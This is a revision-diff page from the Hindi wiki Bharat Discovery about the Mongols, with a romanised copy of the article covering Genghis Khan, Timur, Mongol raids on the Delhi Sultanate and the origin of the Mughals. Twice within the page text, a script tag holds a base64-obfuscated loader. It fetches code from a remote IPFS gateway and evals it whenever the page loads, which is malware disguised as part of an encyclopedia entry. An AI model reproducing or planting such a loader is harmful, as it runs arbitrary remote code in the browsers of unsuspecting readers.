Difference between revisions of "मंगोल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "खिलजी" to "ख़िलजी")
m (Text replace - "फौज" to "फ़ौज")
Line 5: Line 5:
 
मंगोलों के कई समूह विविध समयों में [[भारत]] में आये और उनमें से कुछ यहीं पर बस गए। [[चंगेज़ ख़ाँ]], जिसके भारत पर आक्रमण करने का ख़तरा 1211 ई. में उत्पन्न हो गया था, वह एक मंगोल था। इसी प्रकार से [[तैमूर]] भी, जिसने भारत पर 1398 ई. में हमला किया, वह भी एक मंगोल था। चंगेज ख़ाँ और उसके अनुयायी मुसलमान नहीं थे, किन्तु तैमूर और उसके अनुयायी मुसलमान हो गए थे। '''मंगोल लोग ही मुसलमान बनने के बाद '[[मुग़ल]]' कहलाने लगे।''' 1211 ई. में चंगेज ख़ाँ तो सिन्ध नदी से वापस लौट गया, किन्तु उसके बाद मंगोलों ने और कई आक्रमण भारत पर किए। [[दिल्ली]] के [[बलबन]] और [[अलाउद्दीन ख़िलजी]] जैसे शक्तिशाली सुल्तानों को भी मंगोलों का आक्रमण रोकने में एड़ी-चोट का पसीना एक कर देना पड़ा। 1398 ई. में [[तैमूर]] के हमले ने दिल्ली की सल्तनत की नींवें हिला दीं और मुग़ल वंश की स्थापना का मार्ग प्रशस्त कर दिया, जिसने अठारहवीं शताब्दी में ब्रिटिश शासन की स्थापना होने तक इस देश में राज्य किया।  
 
मंगोलों के कई समूह विविध समयों में [[भारत]] में आये और उनमें से कुछ यहीं पर बस गए। [[चंगेज़ ख़ाँ]], जिसके भारत पर आक्रमण करने का ख़तरा 1211 ई. में उत्पन्न हो गया था, वह एक मंगोल था। इसी प्रकार से [[तैमूर]] भी, जिसने भारत पर 1398 ई. में हमला किया, वह भी एक मंगोल था। चंगेज ख़ाँ और उसके अनुयायी मुसलमान नहीं थे, किन्तु तैमूर और उसके अनुयायी मुसलमान हो गए थे। '''मंगोल लोग ही मुसलमान बनने के बाद '[[मुग़ल]]' कहलाने लगे।''' 1211 ई. में चंगेज ख़ाँ तो सिन्ध नदी से वापस लौट गया, किन्तु उसके बाद मंगोलों ने और कई आक्रमण भारत पर किए। [[दिल्ली]] के [[बलबन]] और [[अलाउद्दीन ख़िलजी]] जैसे शक्तिशाली सुल्तानों को भी मंगोलों का आक्रमण रोकने में एड़ी-चोट का पसीना एक कर देना पड़ा। 1398 ई. में [[तैमूर]] के हमले ने दिल्ली की सल्तनत की नींवें हिला दीं और मुग़ल वंश की स्थापना का मार्ग प्रशस्त कर दिया, जिसने अठारहवीं शताब्दी में ब्रिटिश शासन की स्थापना होने तक इस देश में राज्य किया।  
 
====विजय अभियान====
 
====विजय अभियान====
लड़ाई के मैदान में अगर उन्होंने महान विजय प्राप्त कीं तो अधिक संख्या होने के कारण नहीं, बल्कि अनुशासन और संगठन के कारण और इसका सबसे बड़ा कारण तो यह था कि उन्हें [[चंगेज़ ख़ाँ]] जैसा जगमगाता सेनानी मिला था। इसमें कोई शक नहीं कि इतिहास में चंगेज़ जैसा महान और प्रतिभा वाला सैनिक नेता दूसरा कोई नहीं हुआ है। [[सिकन्दर]] और सीजर इसके सामने नाचीज़ नज़र आते हैं। चंगेज़ न सिर्फ खुद बहुत बड़ा सिपहसलार था, बल्कि उसने अपने बहुत से फौजी अफसरों को तालीम देकर होशियार नायक बना दिया था। अपने वतन से हज़ारों मील दूर होते हुए भी, दुश्मनों और विरोधी जनता से घिरे रहते हुए भी, वे अपने से ज़्यादा तादाद की फौजों से लड़कर उन पर विजय प्राप्त करते थे।
+
लड़ाई के मैदान में अगर उन्होंने महान विजय प्राप्त कीं तो अधिक संख्या होने के कारण नहीं, बल्कि अनुशासन और संगठन के कारण और इसका सबसे बड़ा कारण तो यह था कि उन्हें [[चंगेज़ ख़ाँ]] जैसा जगमगाता सेनानी मिला था। इसमें कोई शक नहीं कि इतिहास में चंगेज़ जैसा महान और प्रतिभा वाला सैनिक नेता दूसरा कोई नहीं हुआ है। [[सिकन्दर]] और सीजर इसके सामने नाचीज़ नज़र आते हैं। चंगेज़ न सिर्फ खुद बहुत बड़ा सिपहसलार था, बल्कि उसने अपने बहुत से फ़ौजी अफसरों को तालीम देकर होशियार नायक बना दिया था। अपने वतन से हज़ारों मील दूर होते हुए भी, दुश्मनों और विरोधी जनता से घिरे रहते हुए भी, वे अपने से ज़्यादा तादाद की फ़ौजों से लड़कर उन पर विजय प्राप्त करते थे।
  
  

Revision as of 08:01, 5 March 2011

mangol, chhoti aankh, pili cham di vali ek jati, jisake dadhi-mooanchh bahut kam hoti hai. mangol log khanabadosh the. ye khanabadosh mard aur auratean b de mazaboot the.

majaboot qad-kathi

mangoloan ko kasht jhelane ki adat thi aur ye log uttari eshiya ke lambe chau de maidanoan mean tambuoan mean rahate the. lekin inaka sharirik bal aur kasht jhelane ka muhavara inake zyada kam n ate, agar inhoanne ek saradar n paida kiya hota, jo b da anokha vyakti tha. shaharoan aur shaharoan ke rang-dhang se bhi unhean nafarat thi. bahut se log samajhate haian ki chooanki ve khanabadosh the, isalie jangali rahe hoange, lekin yah khyal galat hai. shahar ki bahut si kalaoan ka unhean alabatta jnan nahian tha, lekin unhoanne jindagi ka apana ek alag tariqa dhal liya tha aur unaka sangathan bahut hi guantha hua tha.

itihas

mangoloan ke kee samooh vividh samayoan mean bharat mean aye aur unamean se kuchh yahian par bas ge. changez khaan, jisake bharat par akraman karane ka khatara 1211 ee. mean utpann ho gaya tha, vah ek mangol tha. isi prakar se taimoor bhi, jisane bharat par 1398 ee. mean hamala kiya, vah bhi ek mangol tha. changej khaan aur usake anuyayi musalaman nahian the, kintu taimoor aur usake anuyayi musalaman ho ge the. mangol log hi musalaman banane ke bad 'mugal' kahalane lage. 1211 ee. mean changej khaan to sindh nadi se vapas laut gaya, kintu usake bad mangoloan ne aur kee akraman bharat par kie. dilli ke balaban aur alauddin khilaji jaise shaktishali sultanoan ko bhi mangoloan ka akraman rokane mean e di-chot ka pasina ek kar dena p da. 1398 ee. mean taimoor ke hamale ne dilli ki saltanat ki nianvean hila dian aur mugal vansh ki sthapana ka marg prashast kar diya, jisane atharahavian shatabdi mean british shasan ki sthapana hone tak is desh mean rajy kiya.

vijay abhiyan

l daee ke maidan mean agar unhoanne mahan vijay prapt kian to adhik sankhya hone ke karan nahian, balki anushasan aur sangathan ke karan aur isaka sabase b da karan to yah tha ki unhean changez khaan jaisa jagamagata senani mila tha. isamean koee shak nahian ki itihas mean changez jaisa mahan aur pratibha vala sainik neta doosara koee nahian hua hai. sikandar aur sijar isake samane nachiz nazar ate haian. changez n sirph khud bahut b da sipahasalar tha, balki usane apane bahut se fauji aphasaroan ko talim dekar hoshiyar nayak bana diya tha. apane vatan se hazaroan mil door hote hue bhi, dushmanoan aur virodhi janata se ghire rahate hue bhi, ve apane se zyada tadad ki faujoan se l dakar un par vijay prapt karate the.



<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

(pustak 'bharatiy itihas kosh') prishth sankhya-342